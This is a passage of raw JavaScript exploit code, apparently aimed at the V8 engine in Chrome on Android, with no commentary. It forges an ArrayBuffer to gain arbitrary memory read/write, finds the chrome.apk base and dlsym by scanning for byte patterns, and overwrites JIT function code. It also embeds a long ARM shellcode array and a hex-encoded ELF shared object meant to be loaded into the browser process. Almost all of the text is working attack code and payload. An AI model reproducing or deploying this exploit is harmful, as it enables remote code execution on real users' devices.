String.fromCharCode(0x86,0x24);\nclassStr=String.fromCharCode.apply(null,arr);\nvar ab = new ArrayBuffer(0x1243);\nvar fun = eval(classStr); \nObject.assign(fun,hiddenValue);\nvar oobStr = fun.toString();\n\n/*(gdb) x/20xw 0x5600c45c array buffer layout\n * 0x5600c45c: 0x4b009a9d 0x41008125 0x41008125 0x00000020\n * 0x5600c46c: 0x09fda368 0x00000004 0x00000000 0x00000000\n */\n//overwrite huge string as array buffer\nvar abLengthIndex = oobStr.indexOf(magicStr);\nvar strArrayBuffer = oobStr.substr(abLengthIndex-12,32);\n//replace the byteLength\nvar LengthAddr = getObjAddr(lengthInOldSpace);\nvar strLength = String.fromCharCode(0xff&LengthAddr,(0xff00&LengthAddr)>>8,(0xff0000&LengthAddr)>>16,(0xff000000&LengthAddr)>>24);\nvar strBase = \"\\x00\\x00\\x00\\x00\";\nstrArrayBuffer = strArrayBuffer.substr(0,12)+strLength+strBase+strArrayBuffer.substr(20,12);\nstrArrayBuffer = myencode(strArrayBuffer);\nfor(var i=0;i<strArrayBuffer.length/8;i++){\n var d = strArrayBuffer.substr(i*8,8);\n dArray[index/8+i] = str_to_double(d);\n}\n\nvar classStrAddr = getObjAddr(classStr)>>>0;\n//set read position\nvar readOffset = 0x100000-((classStrAddr-1)&0xfffff)-12-0x40000;//12 string head\n//length control the length of unscaped string, generated string has 12 bytes head\n//left 0x1000*2 bytes to avoid gc\nvar subOobStr = oobStr.substr(readOffset,0x40000-24-0x2000);\n\n//save the the chunk head to be corrupted\nvar nextThunkOffset = 0x100000-((classStrAddr-1)&0xfffff)-12;\nvar savedThunkStr = oobStr.substr(nextThunkOffset,0x8100);\nfor(var i =0;i<savedThunkStr.length;i++){\n savedChunk[i] = savedThunkStr.charCodeAt(i);\n}\n\nvar pos1=new String;\nvar pos1addr = getObj24BitsAddr(pos1)-1;\n\n//0x10 size of JSArray, 0x10 size of String head, 8 ALLOCATION_MEMENTO_TYPE 8 fixedarray \nocculen =0x100000-((pos1addr+0x10+0x10+0x8+0x8)&0xfffff);\n//minus the length of double array\nif(occulen<0x40000+16+8)\n throw \"no enough room\";\nocculen = occulen - 0x40000-16-8;//16 size of JSArray, 8 fixedarray\nif(occulen%4!==0)\n throw \"length don't align\";\nvar arrocc=new Array((occulen/4)); \n//set unescape write position\nvar occDoubleArray = dArray.concat();\n\nvar b=unescape(subOobStr);\n//restore the corrupted chunk head\nvar u8 = new Uint8Array(selectedStr,nextTrunk,0x8100);\nfor(var i=0;i<savedChunk.length;i++){\n u8[i] = savedChunk[i];\n}\n\nprint(\"long string allocated at \"+classStrAddr.toString(16));\nif(typeof(selectedStr)===\"string\"){\n print(\"overwrite failed\");\n postMessage(false);\n close();\n return;\n //throw \"overwrite failed\";\n}\nvar fakeab = selectedStr;\nprint(\"faked array buffer byte length is \"+fakeab.byteLength.toString(16));\nvar globaldv = new Uint32Array(fakeab);\n\nfunction read_uint32(from_address){\n var u32 = globaldv[(from_address/4)>>>0];\n return u32>>>0;\n}\n\n\nfunction read_uint8(from_address){\n from_address = from_address>>>0;\n var index = (from_address/4)>>>0;\n var mask = from_address%4;\n var u32 = globaldv[index];\n u32 = u32<<8*(3-mask);\n return u32>>>24;\n}\n\nfunction read_uint32_unalign(from_address){\n var u32 = 0;\n for(var i=3;i>=0;i--){\n var u8 = read_uint8(from_address+i);\n u32 = u32*0x100+u8;\n }\n return u32>>>0;\n}\n\n//rw to execute\n//get function point of v8::internal::Accessors::ReconfigureToDataProperty\nfunction getFixedFunctionPoint(fakeab){\n var FunctionAddress = getObjAddr(Function);\n var u32 = new Uint32Array(fakeab,FunctionAddress-1,0x1000);\n var map = u32[0];\n u32 = new Uint32Array(fakeab,map-1,0x1000);\n //instance descriptors\n var descriptors = u32[7];\n u32 = new Uint32Array(fakeab,descriptors-1,0x1000);\n var lengthAccessorInfo = u32[6];\n u32 = new Uint32Array(fakeab,lengthAccessorInfo-1,0x1000);\n var setterForeign = u32[4];\n u32 = new Uint32Array(fakeab,setterForeign-1,0x1000);\n var functionPoint = u32[1];\n return functionPoint-1;\n}\n\nvar funPoint = getFixedFunctionPoint(fakeab);\nprint(\"ReconfigureToDataProperty at\"+funPoint.toString(16));\nvar pattern=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval\n\nvar point = ((funPoint&~0xfff)-0xdb6000)>>>0;//cf0000\nprint(\"chrome.apk base at \"+point.toString(16));\n\nfunction find(startAddr,len,pattern){\n for(var i=0; i<(len-pattern.length); i++ ) {\n for(var j=0;j<pattern.length;j++){\n var temp = read_uint8(startAddr+i+j);\n //print(temp.toString(16));\n if(temp!=pattern[j]) break;\n }\n if(j==pattern.length) return startAddr+i;\n }\n print(\"find failed\");\n}\nvar pattern_position=find(point,0x10000000,pattern);\n\nprint(\"find pattern at \"+to_hex(pattern_position));\n\n\n\n\n\nfunction get_dest_from_blx(addr) {\n var val = read_uint32_unalign(addr);\n var s = (val & 0x400) >> 10;\n var i1 = 1 - (((val & 0x20000000) >> 29) ^ s);\n var i2 = 1 - (((val & 0x8000000) >> 27) ^ s);\n var i10h = val & 0x3ff;\n var i10l = (val & 0x7fe0000) >> 17;\n var off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2);\n return ((addr + 4) & ~3) + off;\n}\n\nfunction backup_original_code(start_address){\n var backup_arr = [];\n set_access_address(start_address);\n var u8arr=new Uint8Array(faked_ab);\n for(var i=0;i<shellcode.length+4096;i++){\n backup_arr[i]=u8arr[i];\n }\n return backup_arr;\n}\n\nfunction restore_original_code(start_address,backup_arr){\n set_access_address(start_address);\n var u8arr=new Uint8Array(faked_ab);\n for(var i=0;i<shellcode.length+4096;i++){\n u8arr[i]=backup_arr[i];\n }\n}\n\n\nhuge_func({});\nprint(\"blx instruction content is \"+to_hex(read_uint32_unalign(pattern_position-4)));\nvar dlsym_addr = get_dest_from_blx(pattern_position-4);\nprint(\"dlsym address is \"+to_hex(dlsym_addr));\nvar huge_func_address = getObjAddr(huge_func)-1;\nprint(\"huge func address is \"+to_hex(huge_func_address));\nfor(var i=0;i<20;i++){\n print(to_hex(read_uint32(huge_func_address+i*4)));\n}\nvar huge_func_code_entry = read_uint32(huge_func_address+7*4);//dynamic kCodeEntryOffset 3*4\nprint(\"huge func code entry is \"+to_hex(huge_func_code_entry));\nprint(to_hex(read_uint32(huge_func_code_entry)));\n\n//var so_str= \"\";\nvar shellcode = [0xf0,0x4f,0x2d,0xe9,0x79,0x30,0xa0,0xe3,0x8c,0x0b,0xdf,0xed,0x4b,0xdf,0x4d,0xe2,0x61,0x80,0xa0,0xe3,0x00,0x60,0xa0,0xe3,0x73,0x10,0xa0,0xe3,0x74,0x20,0xa0,0xe3,0x5f,0x90,0xa0,0xe3,0x61,0x30,0xcd,0xe5,0x65,0xa0,0xa0,0xe3,0x6d,0xb0,0xa0,0xe3,0x5b,0x30,0xcd,0xe5,0x6e,0xc0,0xa0,0xe3,0x6c,0x30,0xa0,0xe3,0xfa,0x80,0xcd,0xe5,0x64,0x70,0xa0,0xe3,0x72,0x50,0xa0,0xe3,0x60,0x10,0xcd,0xe5,0x6f,0x40,0xa0,0xe3,0x69,0xe0,0xa0,0xe3,0x62,0x10,0xcd,0xe5,0x67,0x80,0xa0,0xe3,0x5a,0x10,0xcd,0xe5,0x18,0x00,0x8d,0xe5,0x70,0x00,0xa0,0xe3,0x63,0x20,0xcd,0xe5,0x0a,0x21,0xcd,0xe5,0x64,0xa0,0xcd,0xe5,0x65,0xb0,0xcd,0xe5,0x5c,0xb0,0xcd,0xe5,0xf8,0x90,0xcd,0xe5,0xf9,0x90,0xcd,0xe5,0x01,0x91,0xcd,0xe5,0x05,0x91,0xcd,0xe5,0x20,0x90,0xa0,0xe3,0xfb,0xc0,0xcd,0xe5,0x09,0xc1,0xcd,0xe5,0xfc,0x70,0xcd,0xe5,0x00,0x71,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x78,0x70,0xa0,0xe3,0xfd,0x50,0xcd,0xe5,0x07,0x51,0xcd,0xe5,0xfe,0x40,0xcd,0xe5,0x03,0x41,0xcd,0xe5,0xff,0xe0,0xcd,0xe5,0x08,0xe1,0xcd,0xe5,0x02,0x31,0xcd,0xe5,0x59,0x30,0xcd,0xe5,0x66,0x60,0xcd,0xe5,0x0b,0x61,0xcd,0xe5,0x5d,0x60,0xcd,0xe5,0x04,0x81,0xcd,0xe5,0x25,0x80,0xa0,0xe3,0x1c,0x0b,0xcd,0xed,0xeb,0x10,0xcd,0xe5,0x18,0x10,0x9d,0xe5,0x9c,0x20,0xcd,0xe5,0x9f,0x20,0xcd,0xe5,0x18,0x20,0x9d,0xe5,0x98,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x9d,0xa0,0xcd,0xe5,0xe8,0xe0,0xcd,0xe5,0x63,0xe0,0xa0,0xe3,0xe9,0xc0,0xcd,0xe5,0xe8,0xc0,0x8d,0xe2,0xed,0xa0,0xcd,0xe5,0x70,0xa0,0x8d,0xe2,0xee,0x30,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x68,0x30,0xa0,0xe3,0x34,0xc0,0x8d,0xe5,0x9e,0xe0,0xcd,0xe5,0xec,0x30,0xcd,0xe5,0x06,0x01,0xcd,0xe5,0x99,0x00,0xcd,0xe5,0x06,0x00,0xa0,0xe1,0x9a,0x50,0xcd,0xe5,0x00,0x50,0x91,0xe5,0x06,0x10,0xa0,0xe1,0x9b,0x40,0xcd,0xe5,0x04,0x40,0x92,0xe5,0x38,0xa0,0x8d,0xe5,0xea,0x90,0xcd,0xe5,0xf0,0x90,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf4,0x80,0xcd,0xe5,0xf2,0x70,0xcd,0xe5,0xf5,0x70,0xcd,0xe5,0xf3,0xb0,0xcd,0xe5,0xa0,0x60,0xcd,0xe5,0xf6,0x60,0xcd,0xe5,0x35,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x58,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x1c,0x00,0x8d,0xe5,0xf8,0x10,0x8d,0xe2,0x10,0x00,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x18,0x80,0x9d,0xe5,0x30,0x00,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x70,0x10,0x8d,0xe2,0x30,0xb0,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x04,0x70,0x98,0xe5,0x00,0x30,0x98,0xe5,0x00,0x70,0x8d,0xe5,0x3b,0xff,0x2f,0xe1,0x60,0x10,0x8d,0xe2,0x1c,0x50,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x00,0x20,0xa0,0xe1,0x70,0x10,0x8d,0xe2,0x02,0x30,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x20,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x98,0x10,0x8d,0xe2,0x1c,0x40,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x18,0x00,0x9d,0xe5,0x07,0x20,0xa0,0xe3,0x0b,0x1a,0xa0,0xe3,0x10,0x50,0x90,0xe5,0xff,0xce,0xc5,0xe3,0x05,0x4a,0x85,0xe2,0x0f,0x30,0xcc,0xe3,0x01,0x0a,0x83,0xe2,0x3a,0xff,0x2f,0xe1,0xbc,0x72,0xd5,0xe1,0x1c,0x90,0x95,0xe5,0x06,0x00,0x57,0xe1,0x09,0x20,0x85,0xe0,0x06,0x00,0x00,0x1a,0x1b,0x00,0x00,0xea,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0x15,0x00,0x00,0x2a,0x00,0xe0,0x92,0xe5,0x01,0x00,0x5e,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x80,0x92,0xe5,0x00,0x00,0x58,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x00,0xa0,0xe3,0x04,0x70,0x92,0xe5,0x00,0xb0,0x85,0xe0,0x00,0xa0,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x00,0x80,0xe2,0x07,0xc0,0xdb,0xe7,0x01,0xc0,0xca,0xe7,0x10,0x30,0x92,0xe5,0x03,0x00,0x50,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x72,0xd5,0xe1,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x1f,0x0b,0x1f,0xed,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x10,0x00,0x9d,0xe5,0x64,0xa0,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x10,0xe1,0xcd,0xe5,0x6e,0x80,0xa0,0xe3,0x69,0x30,0xa0,0xe3,0x11,0xe1,0xcd,0xe5,0x6f,0xc0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x19,0xe1,0xcd,0xe5,0x1d,0xe1,0xcd,0xe5,0x67,0xe0,0xa0,0xe3,0x1e,0x0b,0x8d,0xed,0x12,0xb1,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x11,0x1e,0x8d,0xe2,0x14,0xa1,0xcd,0xe5,0x18,0xa1,0xcd,0xe5,0x15,0x61,0xcd,0xe5,0x1f,0x61,0xcd,0xe5,0x16,0xc1,0xcd,0xe5,0x1b,0xc1,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x17,0x31,0xcd,0xe5,0x20,0x31,0xcd,0xe5,0x1a,0x21,0xcd,0xe5,0x1c,0xe1,0xcd,0xe5,0x1e,0xb1,0xcd,0xe5,0x6d,0xb0,0xa0,0xe3,0x13,0x81,0xcd,0xe5,0x21,0x81,0xcd,0xe5,0x22,0x71,0xcd,0xe5,0x23,0x91,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x63,0x30,0xa0,0xe3,0x70,0x20,0xa0,0xe3,0x14,0x00,0x8d,0xe5,0x73,0xe0,0xa0,0xe3,0x68,0x10,0x8d,0xe2,0x6a,0x60,0xcd,0xe5,0x6d,0x20,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x68,0xe0,0xcd,0xe5,0x10,0x00,0x9d,0xe5,0x6b,0x30,0xcd,0xe5,0x6c,0xb0,0xcd,0xe5,0x69,0x70,0xcd,0xe5,0x6e,0x90,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x20,0xc0,0x95,0xe5,0xb0,0x90,0xcd,0xe5,0x78,0x20,0xa0,0xe3,0xb2,0xe3,0xd5,0xe1,0x25,0x10,0xa0,0xe3,0x2c,0x30,0xa0,0xe3,0xa9,0x20,0xcd,0xe5,0x00,0xb0,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0xa8,0x10,0xcd,0xe5,0x0c,0xc0,0x85,0xe0,0xab,0x10,0xcd,0xe5,0x0e,0xe1,0x8e,0xe0,0xae,0x10,0xcd,0xe5,0x02,0x10,0x8d,0xe0,0x20,0xc0,0x8d,0xe5,0x20,0xc0,0x95,0xe5,0xac,0x20,0xcd,0xe5,0xaf,0x20,0xcd,0xe5,0xa8,0x20,0x8d,0xe2,0xaa,0x30,0xcd,0xe5,0x8e,0xe1,0x8c,0xe0,0xad,0x30,0xcd,0xe5,0x05,0x30,0xa0,0xe1,0x05,0xc0,0x8e,0xe0,0x10,0xe0,0x9c,0xe5,0x00,0xc0,0x8d,0xe5,0x0e,0xc0,0x85,0xe0,0x24,0xc0,0x8d,0xe5,0x04,0xc0,0x8d,0xe5,0x14,0xc0,0x9d,0xe5,0x3c,0xff,0x2f,0xe1,0x73,0xe0,0xa0,0xe3,0x6d,0x00,0xa0,0xe3,0x89,0xa0,0xcd,0xe5,0x67,0xc0,0xa0,0xe3,0x2e,0x30,0xa0,0xe3,0x91,0xa0,0xcd,0xe5,0x79,0x20,0xa0,0xe3,0x65,0x10,0xa0,0xe3,0x8c,0xe0,0xcd,0xe5,0x8e,0x00,0xcd,0xe5,0x6c,0x00,0xa0,0xe3,0x94,0xe0,0xcd,0xe5,0x6f,0xe0,0xa0,0xe3,0x51,0xc0,0xcd,0xe5,0x70,0xc0,0xa0,0xe3,0x96,0x60,0xcd,0xe5,0x52,0xe0,0xcd,0xe5,0x5f,0xe0,0xa0,0xe3,0xb5,0x60,0xcd,0xe5,0xb7,0x00,0xcd,0xe5,0xb9,0xc0,0xcd,0xe5,0x69,0xc0,0xa0,0xe3,0xba,0x00,0xcd,0xe5,0xc1,0x60,0xcd,0xe5,0x8b,0x80,0xcd,0xe5,0x8f,0x90,0xcd,0xe5,0x93,0x80,0xcd,0xe5,0x95,0x70,0xcd,0xe5,0x97,0x90,0xcd,0xe5,0x53,0x70,0xcd,0xe5,0x54,0x90,0xcd,0xe5,0xbb,0x70,0xcd,0xe5,0xbc,0x90,0xcd,0xe5,0x88,0x30,0xcd,0xe5,0x90,0x30,0xcd,0xe5,0x50,0x30,0xcd,0xe5,0xb4,0x30,0xcd,0xe5,0xb8,0x30,0xcd,0xe5,0xc0,0x30,0xcd,0xe5,0x8a,0x20,0xcd,0xe5,0x8d,0x20,0xcd,0xe5,0x92,0x20,0xcd,0xe5,0xb6,0x10,0xcd,0xe5,0xc2,0x10,0xcd,0xe5,0xc3,0x00,0xcd,0xe5,0xb0,0x03,0xd5,0xe1,0xd1,0xe0,0xcd,0xe5,0x61,0xe0,0xa0,0xe3,0xc5,0xa0,0xcd,0xe5,0xd3,0x60,0xcd,0xe5,0xd4,0x60,0xcd,0xe5,0x09,0x00,0x50,0xe1,0xd9,0xa0,0xcd,0xe5,0x6c,0xa0,0xa0,0xe3,0xde,0x60,0xcd,0xe5,0xe2,0x60,0xcd,0xe5,0x6f,0x60,0xa0,0xe3,0xc4,0x30,0xcd,0xe5,0xc6,0x20,0xcd,0xe5,0xc7,0x80,0xcd,0xe5,0xc8,0x90,0xcd,0xe5,0xcc,0x30,0xcd,0xe5,0xcd,0xc0,0xcd,0xe5,0xce,0x80,0xcd,0xe5,0xcf,0xc0,0xcd,0xe5,0xd0,0x70,0xcd,0xe5,0xd2,0xe0,0xcd,0xe5,0xd5,0xe0,0xcd,0xe5,0xd6,0x20,0xcd,0xe5,0xd7,0x90,0xcd,0xe5,0xd8,0x30,0xcd,0xe5,0xda,0xe0,0xcd,0xe5,0xdb,0x70,0xcd,0xe5,0xdc,0xe0,0xcd,0xe5,0xdd,0x30,0xcd,0xe5,0xdf,0x10,0xcd,0xe5,0xe0,0xa0,0xcd,0xe5,0xe1,0x30,0xcd,0xe5,0xe3,0x60,0xcd,0xe5,0xe4,0x90,0xcd,0xe5,0xa6,0x00,0x00,0x0a,0xcc,0xa0,0x8d,0xe2,0xd8,0x60,0x8d,0xe2,0x20,0x70,0x9d,0xe5,0x88,0x20,0x8d,0xe2,0x90,0x30,0x8d,0xe2,0x20,0x90,0x8d,0xe5,0x2c,0x90,0x8d,0xe5,0x09,0x80,0xa0,0xe1,0x50,0x00,0x8d,0xe2,0xb4,0xc0,0x8d,0xe2,0xc0,0xe0,0x8d,0xe2,0x40,0xa0,0x8d,0xe5,0x48,0x60,0x8d,0xe5,0x03,0xa0,0xa0,0xe1,0x24,0x60,0x9d,0xe5,0x44,0x90,0x8d,0xe5,0x24,0x90,0x8d,0xe5,0x02,0x90,0xa0,0xe1,0x14,0x00,0x8d,0xe5,0x28,0xc0,0x8d,0xe5,0x3c,0xe0,0x8d,0xe5,0x4c,0x40,0x8d,0xe5,0x00,0x40,0x97,0xe5,0x09,0x10,0xa0,0xe1,0x04,0x40,0x86,0xe0,0x04,0x00,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x24,0x70,0x8d,0x05,0x1e,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x0a,0x10,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x2c,0x70,0x8d,0x05,0x18,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x50,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x13,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xb4,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x20,0x70,0x8d,0x05,0x0d,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xc0,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x44,0x70,0x8d,0x05,0x07,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xcc,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x02,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xd8,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0xb0,0x13,0xd5,0xe1,0x01,0x80,0x88,0xe2,0x28,0x70,0x87,0xe2,0x01,0x00,0x58,0xe1,0xd3,0xff,0xff,0xba,0x4c,0x40,0x9d,0xe5,0x44,0x90,0x9d,0xe5,0x24,0xa0,0x9d,0xe5,0x20,0x20,0x9d,0xe5,0x2c,0x30,0x9d,0xe5,0x20,0xc0,0x9d,0xe5,0x14,0xe0,0x92,0xe5,0x10,0x10,0x93,0xe5,0x10,0x30,0x9a,0xe5,0x10,0x60,0x9c,0xe5,0xae,0x21,0xb0,0xe1,0x01,0x70,0x85,0xe0,0x03,0xe0,0x85,0xe0,0x06,0x60,0x85,0xe0,0x1b,0x00,0x00,0x0a,0x00,0x80,0xa0,0xe3,0x24,0xb0,0x8d,0xe5,0x1c,0xb0,0x9d,0xe5,0x1c,0x90,0x8d,0xe5,0x08,0x90,0xa0,0xe1,0x20,0x80,0x9d,0xe5,0x20,0xa0,0x8d,0xe5,0x06,0xa0,0xa0,0xe1,0x0e,0x60,0xa0,0xe1,0x14,0x50,0x8d,0xe5,0x04,0x20,0x9a,0xe5,0x01,0x90,0x89,0xe2,0x08,0xa0,0x8a,0xe2,0x08,0x50,0x1a,0xe5,0x10,0x00,0x9d,0xe5,0x52,0xe4,0xef,0xe7,0x0e,0x12,0x96,0xe7,0x01,0x10,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x05,0x00,0x84,0xe7,0x14,0x30,0x98,0xe5,0xa3,0x01,0x59,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x50,0x9d,0xe5,0x06,0xe0,0xa0,0xe1,0x24,0xb0,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x20,0xa0,0x9d,0xe5,0x14,0xc0,0x99,0xe5,0x10,0x20,0x99,0xe5,0xac,0x11,0xb0,0xe1,0x00,0x10,0xa0,0x13,0x02,0x50,0x85,0xe0,0x01,0x00,0xa0,0x11,0x0c,0x00,0x00,0x0a,0x01,0x30,0xa0,0xe1,0x01,0x00,0x80,0xe2,0x05,0xc0,0xb3,0xe7,0x08,0x10,0x81,0xe2,0x04,0x20,0x93,0xe5,0x52,0x34,0xef,0xe7,0x03,0x22,0x8e,0xe0,0x04,0x30,0x92,0xe5,0x04,0x20,0x83,0xe0,0x04,0x20,0x8c,0xe7,0x14,0xc0,0x99,0xe5,0xac,0x01,0x50,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x00,0x9a,0xe5,0x2b,0x1b,0x9f,0xed,0x20,0x22,0xb0,0xe1,0x20,0x1b,0x8d,0xed,0x0e,0x80,0xa0,0x11,0x00,0x60,0xa0,0x13,0x80,0x50,0x8d,0x12,0x04,0x00,0x00,0x1a,0x0d,0x00,0x00,0xea,0x14,0x90,0x9a,0xe5,0x10,0x80,0x88,0xe2,0x29,0x02,0x56,0xe1,0x09,0x00,0x00,0x2a,0x00,0xe0,0x98,0xe5,0x05,0x10,0xa0,0xe1,0x01,0x60,0x86,0xe2,0x0e,0x00,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0xf4,0xff,0xff,0x1a,0x04,0x70,0x98,0xe5,0x07,0x40,0x84,0xe0,0x01,0x00,0x00,0xea,0xcc,0x4c,0x0c,0xe3,0x14,0x48,0xdf,0xe7,0x18,0xb0,0x9d,0xe5,0x70,0x10,0x8d,0xe2,0xe8,0x20,0x8d,0xe2,0x30,0x50,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x0c,0xa0,0x9b,0xe5,0x08,0x30,0x9b,0xe5,0x00,0xa0,0x8d,0xe5,0x35,0xff,0x2f,0xe1,0x18,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x4b,0xdf,0x8d,0xe2,0xf0,0x8f,0xbd,0xe8,0x00,0x90,0xa0,0xe1,0x20,0x00,0x8d,0xe5,0x00,0xa0,0xa0,0xe1,0x2c,0x00,0x8d,0xe5,0x00,0x20,0xa0,0xe1,0x00,0x30,0xa0,0xe1,0x98,0xff,0xff,0xea,0x00,0xf0,0x20,0xe3,0x73,0x6f,0x5f,0x6d,0x61,0x69,0x6e,0x00,];\nvar so_str = \"7f454c460101010000000000000000000300280001000000000000003400000044110000000000053400200008002800150014000600000034000000340000003400000000010000000100000400000004000000030000003401000034010000340100001300000013000000040000000100000001000000000000000000000000000000d80d0000d80d0000050000000010000001000000a40e0000a41e0000a41e00006c01000082010000060000000010000002000000a80e0000a81e0000a81e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070d40c0000d40c0000d40c00002000000020000000040000000400000052e57464a40e0000a41e0000a41e00005c0100005c01000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d00000000000000000000001200000034000000000000000000000012000000480000000000000000000000120000004f000000000000000000000012000000560000000000000000000000120000005d000000a00800003404000012000800650000000000000000000000120000006e0000000000000000000000120000007f0000000000000000000000110000009100000010200000000000001000f1ff9800000010200000000000001000f1ffa400000026200000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707230005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f63006d656d736574006d656d63707900736f5f6d61696e006d70726f74656374005f5f737461636b5f63686b5f6661696c005f5f737461636b5f63686b5f6775617264005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f0072636532757873732e736f00000000030000000f0000000c0000000e0000000d0000000000000000000000000000000200000001000000040000000000000006000000050000000800000007000000030000000a000000090000000b000000a41e0000170000000020000017000000d01f0000150b0000e01f000016010000e41f000016020000e81f000016040000ec1f000016050000f01f000016060000f41f000016070000f81f000016090000fc1f0000160a000004e02de504e09fe50ee08fe008f0bee5741b000000c68fe201ca8ce274fbbce500c68fe201ca8ce26cfbbce500c68fe201ca8ce264fbbce500c68fe201ca8ce25cfbbce500c68fe201ca8ce254fbbce500c68fe201ca8ce24cfbbce500c68fe201ca8ce244fbbce500c68fe201ca8ce23cfbbce500482de904b08de20c309fe503308fe00300a0e1e1ffffeb0088bde8281b000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1cbffffeb0030a0e10300a0e104d04be20088bde8b8ffffffc41a000020d04de20c008de508108de504208de500308de50030a0e31730cde50030a0e318308de5210000ea0030a0e31c308de50030a0e31c308de50f0000ea18209de51c309de5033082e004209de5033082e00020d3e50c109de51c309de5033081e00030d3e5030052e10000000a060000ea1c309de5013083e21c308de51c209de508309de5030052e1ebffff3a1c209de508309de5030052e10100001a18309de5090000ea18309de5013083e218308de518209de508309de5032082e000309de5030052e1d7ffff9a0030e0e30300a0e120d08de21eff2fe104e02de524d04de20c008de508108de514329fe503308fe0003093e50320a0e108329fe503308fe002c0a0e10700b3e800008ce504108ce508208ce5f0319fe503308fe00030d3e5013023e27330efe6000053e36900000ad8319fe503308fe00120a0e30020c3e508309de500308de50600a0e3c0319fe503308fe00310a0e1b8319fe503308fe00320a0e10c309de56dffffeb08309de5003093e510308de510309de5043083e2003093e514308de510309de50c3083e218308de518309de500308de50600a0e374319fe503308fe00310a0e16c319fe503308fe00320a0e114309de558ffffeb5c319fe503308fe0002093e514309de5033082e00300a0e154ffffeb0030a0e11c308de53c319fe503308fe0002093e514309de5033082e01c009de50010a0e30320a0e14cffffeb10309de51c009de50310a0e10c20a0e34affffeb1c309de50c1083e200319fe503308fe0002093e5f8309fe503308fe0003093e50100a0e10210a0e10320a0e13effffebe0309fe503308fe0003093e50c3083e21c209de5032082e018309de50200a0e10310a0e114209de533ffffeb1c309de5043083e2b0209fe502208fe0001092e514209de5022081e0002083e51c309de5043083e2003093e51c209de50c2082e200208de50600a0e380209fe502208fe00210a0e178209fe502208fe015ffffeb08309de51c209de5002083e564309fe503308fe0003093e5013083e20c009de508109de533ff2fe10030a0e10300a0e124d08de204f09de4d4190000a8190000ac190000901900004406000040060000f005000008060000f8180000d418000090180000881800006c18000038180000dc040000f4040000d817000010402de928d04de20c008de570439fe504408fe06c339fe5033094e7003093e524308de560339fe503308fe00030d3e5013023e27330efe6000053e3c